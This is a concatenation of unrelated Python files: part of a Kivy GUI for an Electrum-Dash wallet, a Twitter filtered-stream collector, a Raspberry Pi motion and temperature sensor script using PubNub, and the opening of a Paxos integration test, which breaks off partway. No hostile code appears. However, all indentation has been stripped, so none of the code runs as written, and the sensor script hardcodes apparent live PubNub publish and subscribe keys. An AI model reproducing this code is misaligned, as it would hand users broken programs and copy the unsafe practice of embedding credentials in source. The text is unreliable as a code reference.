info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
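# _broadcast_thread() runs off the UI thread: unless a BIP70 payment request
# asks the wallet not to, it broadcasts the transaction through the
# PrivateSend manager; if a payment request is present it also sends the
# Payment message and waits for the ACK, then reports (status, msg) back to
# the UI via Clock.schedule_once.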
def _broadcast_thread(self, tx, pr, on_complete):
status = False
if pr and pr.has_expired():
self.send_screen.payment_request = None
status, msg = False, _("Invoice has expired")
Clock.schedule_once(lambda dt: on_complete(status, msg))
return
need_broadcast = True if not pr or pr.need_broadcast_tx else False
txid = tx.txid()
try:
if need_broadcast:
coro = self.wallet.psman.broadcast_transaction(tx)
self.network.run_from_another_thread(coro)
else:
self.logger.info(f'Do not broadcast: {txid}, send bip70'
f' Payment msg to: {pr.payment_url}')
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except PSPossibleDoubleSpendError as e:
msg = str(e)
except PSSpendToPSAddressesError as e:
msg = str(e)
except BestEffortRequestFailed as e:
msg = repr(e)
else:
if pr:
self.send_screen.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
if need_broadcast:
status, msg = True, txid
else:
status, msg = ack_status, ack_msg
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, pr, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') +
':\n' + _('Electrum network not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
is_ps = getattr(screen, 'is_ps', None)
def amount_cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
if is_ps is None:
popup = AmountDialog(show_max, amount, cb=amount_cb)
else:
popup = AmountDialog(show_max, amount, is_ps=is_ps, cb=amount_cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
else:
self._addresses_dialog.update()
self._addresses_dialog.open()
def coins_dialog(self, filter_val=0):
from .uix.dialogs.coins_dialog import CoinsDialog
popup = CoinsDialog(self, filter_val=filter_val)
popup.update()
popup.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
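# protected() gates an action behind user confirmation: if a PIN code is
# configured it asks for the PIN, otherwise it shows an OK/Cancel dialog;
# on success it calls f(*args, self.password), on failure it calls
# on_failure(*args) when provided.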
def protected(self, msg, f, args, on_failure=None):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: on_failure(*args) if on_failure else None)
d.open()
else:
def q_callback(b):
if b:
f(*args, self.password)
elif on_failure:
on_failure(*args)
d = Question(
msg,
q_callback,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
backup_dir = util.android_backup_dir()
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def set_top_progress(self, value):
if 'top_prog_bar' in self.root.ids:
self.root.ids.top_prog_bar.value = value
def get_top_progress(self):
if 'top_prog_bar' in self.root.ids:
return self.root.ids.top_prog_bar.value
else:
return 100
def on_mn_list_updated(self, event, *args):
self._trigger_update_readiness()
def update_readiness(self, dt):
if self.get_top_progress() >= 100:
return
if self.network:
readiness = self.network.network_data_readiness()
else:
readiness = 0
self.set_top_progress(readiness)
|
colector.py
|
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.dirname(os.path.realpath(__file__))))
import requests
import urllib.request
import json
from io import StringIO
import time
import colect_exceptions
import pandas as pd
from datetime import datetime, timezone
import threading
class Colector():
"""**Colector class for Tweets streaming colect.**
Constructor that manages all actions related to interface with Twitter API.
It will call an enviornment variable called 'BEARER_TOKEN' in which the
bearer token from your account API needs to be stored.
To start data colection run:
``>>> Colector.run()``
To stop data colection press:
``CTRL + C``
Or close bash session.
**To set your enviornment variable open your terminal and run the
following line on bash:**
``export 'BEARER_TOKEN'='<your_bearer_token>'``
*Replace <your_bearer_token> with your own bearer token.*
"""
def __init__(self):
self._data = []
self.stream = []
self.response = None
self.rules = None
self.rules_for_filter = [
{"value": "COVID lang:pt", "tag": "Covid rule"},
{"value": "Saúde lang:pt", "tag": "Saúde rule"},
]
self.batch_number = 0
self.file_number = 0
self.archive_name_prefix = 'db_datalake_tw_covid_saude_'
self.archive_extension = '.json'
self._bearer_token = os.environ.get("BEARER_TOKEN")
self.url_base = "https://api.twitter.com"
self.url_search_rules = self.url_base + "/2/tweets/search/stream/rules"
self.url_search_stream = self.url_base + "/2/tweets/search/stream"
self.max_tweets_json = 200
self.timer_start = 0
self.batch_time_window_in_minutes = 30
self.waiting_seconds = 60
self.response_line = b''
self.whatchdog_counter = 0
self.keep_alive = True
def run(self):
"""**Subprocess to start the streaming and loading data into datalake
as JSON files containing 200 tweets each.**
The JSON files will be stored at .\data\ as
'db_datalake_tw_covid_saude_<batch_number>_<file_number>.json'.
:raises colect_exceptions.GetException: Authentication error occurred
when communication with Twitter API does not succeed.
"""
attempts = 1
if self.connect() and attempts >= 1:
try:
try:
self.delete_rules()
self.set_rules()
except:
raise colect_exceptions.GetException()
try:
self.timer_start = time.perf_counter()
self.get_stream()
print('\nStarting watchdog.\n')
whatchdog = threading.Thread(target=self._stream_whatchdogs)
whatchdog.start()
print('\nStarting JSON files creation.\n')
save_stream_process = threading.Thread(target=self.save_stream)
save_stream_process.start()
attempts = 0
#self.save_stream()
except:
pass
except:
print('No internet connection.\n')
print('Verify that the API bearer token is set in the OS environment variables.')
print('Verify your internet connection.')
time.sleep(30)
# whatchdog.join()
# save_stream_process.join()
time.sleep(5)
else:
# whatchdog.join()
# save_stream_process.join()
print('\nInternet connection down.\n')
print('\nRetry in 30 seconds...\n')
time.sleep(30)
print('\nRestarting processes.\n')
self.run()
def _bearer_oauth(self,r):
"""**Private method for Twitter's Bearer Token authentication.**
:return: The prepared request with the Authorization and User-Agent
headers set, as expected by the requests auth hook interface.
"""
r.headers["Authorization"] = f"Bearer {self._bearer_token}"
r.headers["User-Agent"] = "v2FilteredStreamPython"
return r
def connect(self):
try:
urllib.request.urlopen('https://twitter.com')
return True
except:
return False
def get_rules(self):
"""**HTTP Method to get rules of a twitter's filtered stream configured
on server side.**
:raises Exception: Failed to connect to Twitter.
Probably due to a missing API bearer token in the OS environment variables.
:return: Response from Twitter API with rules on server side.
:rtype: request.Response
"""
print('\nGetting rules from Twitter API server:\n')
self.response = requests.get(
self.url_search_rules,
auth=self._bearer_oauth,
)
if self.response.status_code != 200:
raise Exception(
"Cannot get rules (HTTP {}): {}".format(
self.response.status_code,
self.response.text)
)
self.rules = self.response.json()
print(json.dumps(self.rules))
return self.response
def delete_rules(self):
"""**HTTP Method to delete rules of a twitter's filtered stream configured
on server side.**
:raises Exception: Failed to connect to Twitter.
Probably due to a missing API bearer token in the OS environment variables.
:return: Response from Twitter API with information about the deleted rules
or errors on the server side.
:rtype: request.Response
"""
self.get_rules()
if self.rules is None or "data" not in self.rules:
return None
ids = list(map(lambda rule: rule["id"], self.rules["data"]))
payload = {"delete": {"ids": ids}}
print('\nDeleting rules:\n')
self.response = requests.post(
self.url_search_rules,
auth=self._bearer_oauth,
json=payload,
)
if self.response.status_code != 200:
raise Exception(
"Cannot delete rules (HTTP {}): {}".format(
self.response.status_code, self.response.text
)
)
self.get_rules()
print(json.dumps(self.response.json()))
return self.response
def set_rules(self):
"""**HTTP Method to set rules of a twitter's filtered stream configured
on server side.**
:raises Exception: Failed to connect to Twitter.
Probably due to a missing API bearer token in the OS environment variables.
:return: Response from Twitter API with information about the rules that were set
or errors on the server side.
:rtype: request.Response
"""
payload = {"add": self.rules_for_filter}
try:
print('\nSetting rules for Twitter API:\n')
self.response = requests.post(
self.url_search_rules,
auth=self._bearer_oauth,
json=payload,
)
except:
print('\nSet rules failed. Verify your bearer token and connection.\n')
raise Exception
if self.response.status_code != 201:
raise Exception(
"Cannot add rules (HTTP {}): {}".format(
self.response.status_code,
self.response.text
)
)
self.get_rules()
print(json.dumps(self.response.json()))
return self.response
def get_stream(self):
"""**HTTP method to get stream data.**
This HTTP method gets data from the twitter's filtered stream with its
configured parameters and rules for filtering.
:return: Response from Twitter API with stream data.
:rtype: request.Response
"""
print('\nStart streaming.\n')
self.whatchdog_timer = time.perf_counter()
self.stream = requests.get(
self.url_search_stream,
auth=self._bearer_oauth,
params={"tweet.fields": "created_at",
"expansions": "author_id",
"backfill_minutes": 3},
stream=True,
)
print(self.stream.status_code)
if self.stream.status_code != 200:
raise Exception(
"Cannot get stream (HTTP {}): {}".format(
self.stream.status_code, self.stream.text
)
)
return self.stream
def _stream_whatchdogs(self):
"""**Keep-alive signal monitoring.**
This watchdog monitors the keep-alive signal from Twitter's streaming
and restarts the streaming if it disconnects.
:return: False to end the process
:rtype: Boolean
"""
try:
keep_alive_period = time.perf_counter() - self.whatchdog_timer
if (keep_alive_period > self.waiting_seconds/6
and self.whatchdog_counter < 1):
print('\nKeep-alive watchdog says:')
print('ping\n')
self.whatchdog_counter += 1
return True
elif (keep_alive_period > self.waiting_seconds
and self.keep_alive):
self.keep_alive = False
return True
elif (keep_alive_period < self.waiting_seconds):
return True
else:
try:
print('\nConnection lost. Waiting...\n')
self.whatchdog_counter = 0
self.keep_alive = True
self.whatchdog_timer = time.perf_counter()
time.sleep(self.waiting_seconds)
print('Try reconnecting.')
self.run()
except:
return False
except:
return False
def save_stream(self):
"""**Saves the stream into a list.**
The list (<self._data>) is a private variable and each tweet is saved
in one element of it.
Every time <self._data> reaches <self.max_tweets_json> items,
the data is saved into a JSON file with the save_json_file()
method.
Every 30 minutes a new batch of files are created for db control
purposes.
"""
try:
for self.response_line in self.stream.iter_lines():
if self.response_line == b'':
print('\nTwitter says:')
print('pong\n')
self.keep_alive = True
self.whatchdog_timer = time.perf_counter()
self.whatchdog_counter = 0
self._stream_whatchdogs()
if self.response_line:
json_response = json.loads(self.response_line)
#print(json.dumps(json_response, indent=4, sort_keys=True))
self._data.append(json_response)
if len(self._data) % self.max_tweets_json == 0:
print('Storing data on batch {}, file {}'.format(
self.batch_number,
self.file_number))
if self.timer_30_minutes():
self.save_json_file()
else:
self.timer_start = time.perf_counter()
self.save_json_file()
self.batch_number +=1
self.file_number = 0
except AttributeError:
print("\nStream not started.\n")
time.sleep(self.waiting_seconds)
print("Starting stream.\n")
self.run()
def save_json_file(self):
"""**Create JSON file from stream data.**
Saves the stream into JSON files with the following name structure:
<self.archive_name_prefix><self.batch_number>_<self.file_number>_<utc_timestamp>.json
After .json creation, the <self._data> list is reset.
"""
date = datetime.now(timezone.utc).strftime("%Y%m%d%H%M%S")
self.archive_name = (self.archive_name_prefix
+ str(self.batch_number)
+ '_'
+ str(self.file_number)
+ '_'
+ date
+ self.archive_extension)
pd.read_json(StringIO(json.dumps(self._data)),
orient='records').to_json(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'data',
self.archive_name),
orient='records')
self._data = []
self.file_number +=1
def timer_30_minutes(self):
"""**Timer function for 30 minutes.**
It returns True while the 30-minute batch window is still open and
False once it has elapsed.
:return: True if the time counter is less than 30 minutes and False
otherwise.
:rtype: Boolean
"""
timer_end = self.timer_start + self.batch_time_window_in_minutes*60
timer_now = time.perf_counter()
return timer_now < timer_end
def main():
colector = Colector()
colector.run()
if __name__ == "__main__":
main()
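# Minimal usage sketch (assumes a valid Twitter API v2 bearer token is
# exported in the environment; file names follow save_json_file() above):
#   $ export BEARER_TOKEN='<your_bearer_token>'
#   $ python colector.py
# JSON batches are then written to ./data/ as
# db_datalake_tw_covid_saude_<batch>_<file>_<utc_timestamp>.json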
|
sensors.py
|
import RPi.GPIO as GPIO
import Adafruit_DHT
import time, threading, spidev
from pubnub.callbacks import SubscribeCallback
from pubnub.enums import PNStatusCategory
from pubnub.pnconfiguration import PNConfiguration
from pubnub.pubnub import PubNub
pnconfig = PNConfiguration()
pnconfig.subscribe_key = 'sub-c-c96cd480-3528-11e8-a218-f214888d2de6'
pnconfig.publish_key = 'pub-c-f141a42f-ae6d-4f11-bbaf-4bc7cb518b6c'
##########################
pnconfig.cipher_key = 'myCipherKey'
pnconfig.auth_key = 'raspberry-pi'
pnconfig.ssl = True
pubnub = PubNub(pnconfig)
myChannel = "RSPY"
PIR_pin = 23
Buzzer_pin = 24
LED = 18
dht11_pin = 5
sensorsList = ["buzzer"]
data = {}
# Define MCP3008 channels
light_channel = 0
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIR_pin, GPIO.IN)
GPIO.setup(Buzzer_pin, GPIO.OUT)
GPIO.setup(LED, GPIO.OUT)
# Open SPI bus
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz=1000000
# scales the given range into desired range
# https://stackoverflow.com/a/23157705/5167801
def scale(valueIn, baseMin, baseMax, limitMin, limitMax):
return ((limitMax - limitMin) * (valueIn - baseMin) / (baseMax - baseMin)) + limitMin
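# Worked example with assumed readings: scale(350, 10, 700, 0, 100)
# = (100 - 0) * (350 - 10) / (700 - 10) + 0 ≈ 49.3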
# Function to read SPI data from MCP3008 chip
# Channel must be an integer 0-7
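# The 3-byte SPI transfer below follows the MCP3008 protocol: 0x01 is the
# start bit, (8 + channel) << 4 selects single-ended mode and the channel in
# the upper nibble of the second byte, and the third byte clocks out the
# reply. The 10-bit reading is the low 2 bits of adc[1] plus all of adc[2].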
def ReadChannel(channel):
adc = spi.xfer2([1,(8+channel)<<4,0])
data = ((adc[1]&3) << 8) + adc[2]
scaled = scale(data, 10, 700, 0, 100)
if (scaled <= 40):
GPIO.output(LED, True)
else:
GPIO.output(LED, False)
return scaled
def my_publish_callback(envelope, status):
# Check whether request successfully completed or not
if not status.is_error():
pass # Message successfully published to specified channel.
else:
print("Unable to send message:", status.error_data.information)
def publish(channel, msg):
pubnub.publish().channel(channel).message(msg).pn_async(my_publish_callback)
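# beep() drives the buzzer with a software square wave: 60 cycles of
# 1 ms high / 1 ms low (roughly a 500 Hz tone for ~120 ms) per beep,
# repeated `repeat` times with a 20 ms pause between beeps.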
def beep(repeat):
for i in range(0, repeat):
for pulse in range(60): # square wave loop
GPIO.output(Buzzer_pin, True)
time.sleep(0.001) # high for 1 millisec
GPIO.output(Buzzer_pin, False)
time.sleep(0.001) # low for 1 millisec
time.sleep(0.02) # add a pause between each cycle
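# motionDetection() loops roughly once per second: it publishes the light
# level, beeps and publishes {"motion": "Yes"} when the PIR pin goes high,
# publishes {"motion": "No"} once motion stops, and beeps twice per loop
# while the remote "alarm" flag is set.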
def motionDetection():
data["alarm"] = False
print("sensors started")
trigger = False
while True:
publish(myChannel, {"light": str(ReadChannel(light_channel))})
time.sleep(1) # give some rest to Raspberry Pi
if GPIO.input(PIR_pin):
beep(4)
trigger = True
publish(myChannel, {"motion": "Yes"})
print('motion detected!')
time.sleep(0.5)
elif trigger:
publish(myChannel, {"motion": "No"})
trigger = False
if data["alarm"]:
beep(2)
def readDht11():
while True:
hum, tempC = Adafruit_DHT.read_retry(11, dht11_pin)
tempF = tempC * 9/5.0 + 32
publish(myChannel, {"atmos": {"tempC": str(tempC), "tempF": str(tempF), "hum": hum}})
class MySubscribeCallback(SubscribeCallback):
def presence(self, pubnub, presence):
pass # handle incoming presence data
def status(self, pubnub, status):
if status.category == PNStatusCategory.PNUnexpectedDisconnectCategory:
pass # This event happens when radio / connectivity is lost
elif status.category == PNStatusCategory.PNConnectedCategory:
# Connect event. You can do stuff like publish, and know you'll get it.
# Or just use the connected event to confirm you are subscribed for
# UI / internal notifications, etc
# send("")
publish(myChannel, "Device connected!!")
elif status.category == PNStatusCategory.PNReconnectedCategory:
pass
# Happens as part of our regular operation. This event happens when
# radio / connectivity is lost, then regained.
elif status.category == PNStatusCategory.PNDecryptionErrorCategory:
pass
# Handle message decryption error. Probably client configured to
# encrypt messages and on live data feed it received plain text.
def message(self, pubnub, message):
global data
print(message.message)
try:
msg = message.message
key = list(msg.keys())
if (key[0]) == "event": # {"event": {"sensor_name": True } }
self.handleEvent(msg)
except Exception as e:
print("Receiving message: ", message.message)
def handleEvent(self, msg):
global data
eventData = msg["event"]
key = list(eventData.keys())
if key[0] in sensorsList:
if eventData[key[0]] is True:
data["alarm"] = True
elif eventData[key[0]] is False:
data["alarm"] = False
if __name__ == '__main__':
pubnub.add_listener(MySubscribeCallback())
pubnub.subscribe().channels(myChannel).execute()
time.sleep(3)
sensorsThread = threading.Thread(target=motionDetection)
sensorsThread.start()
dhtThread = threading.Thread(target=readDht11)
dhtThread.start()
|
concurrency_test.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import sys
import datetime
import time
import random
import threading
import socket
from it.paxoscli import PaxosClient, PaxosError, ids_dic, init_view, request, request_ex
from it.ngxctl import ngx_start, ngx_stop, ngx_restart
from it.sto import init_sto
g1 = ids_dic("1")
g2 = ids_dic("2")
g3 = ids_dic("3")
g12 = ids_dic("12")
g23 = ids_dic("23")
g13 = ids_dic("13")
g123 = ids_dic("123")
def err_rst( code ):
return { "err": { "Code": code } }
class ee( object ):
NoChange = err_rst("NoChange")
NoView = err_rst("NoView")
DuringChange = err_rst("DuringChange")
QuorumFailure = err_rst("QuorumFailure")
VerNotExist = err_rst("VerNotExist")
def randsleep( ratio=1 ):
time.sleep( random.random()*0.4*ratio )
def dd( args, *more_args ):
dt = str(datetime.datetime.now())
out( dt, *( args + list(more_args) ) )
def out( *args ):
os.write( 1, " ".join( [str(x) for x in args] ) + "\n" )
def integration_test():
cases = (
# func, args, result, result_filter
( "set",
(init_view,(1,(1,2,3)), {}),
(init_view,(2,(1,2,3)), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123]}),
(request,('get',1,{"key":"i"}),{"ver":1, "key":"i"}),
(request,('set',1,{"key":"i", "val":100}),{"ver":2, "key":"i", "val":100}),
(request,('get',2,{"key":"i"}),{"ver":2, "key":"i", "val":100}),
# re-set does not change
(request,('set',1,{"key":"i", "val":100}),{"ver":2, "key":"i", "val":100}),
(ngx_stop,('2',), None),
(ngx_stop,('3',), None),
(time.sleep, (1,), None ),
# set without changing require quorum too
(request,('set',1,{"key":"i", "val":100}),ee.QuorumFailure),
(ngx_start,('2',), None),
(time.sleep, (1,), None ),
(request,('set',1,{"key":"i", "val":{"foo":"bar"}}),{ "ver":3, "key":"i", "val":{ "foo":"bar" } }),
# re-set table value
(request,('set',1,{"key":"i", "val":{"foo":"bar"}}),{ "ver":3, "key":"i", "val":{ "foo":"bar" } }),
# set with specific ver
(request,('set',1,{"key":"i", "ver":2, "val":{"foo":"bar"}}),{ "err":{ "Code":"VerNotExist", "Message":3 } }),
# set with different table value
(request,('set',1,{"key":"i", "ver":3, "val":{"FOO":"bar"}}),{ "ver":4, "key":"i", "val":{ "FOO":"bar" } }),
),
( "get",
(init_view,(1,(1,2,3)), {}),
(init_view,(2,(1,2,3)), {}),
(request,('get',1,{"key":"i"}),{"ver":1, "key":"i"}),
(request,('set',1,{"key":"i", "val":100}),{"ver":2, "key":"i", "val":100}),
(request,('get',2,{"key":"i", "ver":2}),{"ver":2, "key":"i", "val":100}),
(request,('get',2,{"key":"i", "ver":0}),{ "err":{ "Code":"VerNotExist", "Message":2 } }),
(request,('get',2,{"key":"i", "ver":1}),{ "err":{ "Code":"VerNotExist", "Message":2 } }),
(request,('get',2,{"key":"i", "ver":3}),{ "err":{ "Code":"VerNotExist", "Message":2 } }),
),
( "unable to elect with only 1 member",
(request,('get_view',1,),ee.NoView),
(request,('get_view',2,),ee.NoView),
(init_view,(1,(1,2,3)), {}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g123]}),
(request,('get_leader',1,),{"ver":1,"key":"leader"}),
(request,('get_or_elect_leader',1,),ee.QuorumFailure),
),
( "able to elect with only 2 members",
(init_view,(1,(1,2,3)), {}),
(init_view,(2,(1,2,3)), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123]}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',2,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_leader',1,),{"ver":2,"key":"leader", "val":{"ident":"1", "__lease":1}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader","val":{"ident":"1", "__lease":0}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader"}),
(request,('get_or_elect_leader',2,),{"ver":3,"key":"leader","val":{"ident":"2", "__lease":1}}),
# get leader with version specified
(request,('get',2,{"key":"leader", "ver":3}),{"ver":3,"key":"leader","val":{"ident":"2", "__lease":1}}),
(request,('get',2,{"key":"leader", "ver":4}),{"err": { "Code": "VerNotExist", "Message":3 }}),
),
( "unable to elect with 2 members with different ver",
(init_view,(1,(1,2,3)), {}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g123]}),
(init_view,(2,(1,2,3), 2), {}),
(request,('get_view',2,),{"ver":2,"key":"view","val":[g123]}),
# 1 will load latest version=2 from 2, and then try to elect
# leader with version=2 and would find that it locally does not
# have committed data with version=2
(request,('get_or_elect_leader',1,),ee.QuorumFailure),
(request,('get_or_elect_leader',2,),ee.QuorumFailure),
(request,('get_leader',1,),{"ver":2, "key":"leader"}),
),
( "elect with dual view",
(init_view,(1,((1,2,3), (1,2))), {}),
(init_view,(2,((1,2,3), (1,2))), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123, g12]}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',1,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_or_elect_leader',2,),{"ver":2, "key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('get_leader',1,),{"ver":2,"key":"leader", "val":{"ident":"1", "__lease":1}}),
(request,('read',1,),{"ver":2,"val":{"leader":{"ident":"1", "__lease":1}, "view":[g123, g12]}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader","val":{"ident":"1", "__lease":0}}),
(time.sleep, (1,), None ),
(request,('get_leader',1,),{"ver":2,"key":"leader"}),
(request,('get_or_elect_leader',2,),{"ver":3,"key":"leader","val":{"ident":"2", "__lease":1}}),
),
( "elect failure with dual view",
(init_view,(1,((1,2,3), (1,3))), {}),
(init_view,(2,((1,2,3), (1,3))), {}),
(request,('get_view',2,),{"ver":1,"key":"view","val":[g123, g13]}),
(request,('get_or_elect_leader',1,),ee.QuorumFailure),
),
( "change_view",
(init_view,(1,(1,)), {}),
(ngx_stop,(2,),None),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g1]}),
(request,('change_view',1,{"add":g23}),{"ver":3,"key":"view","val":[g123]}),
(request,('get_view',1,),{"ver":3,"key":"view","val":[g123]}),
(request,('get_view',3,),{"ver":3,"key":"view","val":[g123]}),
(request,('change_view',1,{"add":g23}),{"ver":3,"key":"view","val":[g123]}),
),
( "change_view without any change",
(init_view,(1,(1,)), {}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g1]}),
(request,('change_view',1,{}), {"ver":1,"key":"view","val":[g1]}),
(request,('get_view',1,),{"ver":1,"key":"view","val":[g1]}),
),
( "change_view in process, come to consistent state",
(init_view,(1,((1,),(1,2)),2), {}),
(request,('get_view',1,),{"ver":2,"key":"view","val":[g1, g12]}),
(request,('get_view',2,),ee.NoView),
(request,('change_view',1,{}), ee.DuringChange),
(request,('get_view',1,),{"ver":3,"key":"view","val":[g12]}),
),
( "change_view with unmatched versions",
(init_view,(1,(1,2,3),2), {}),
(request,('get_view',1,),{"ver":2,"key":"view","val":[g123]}),
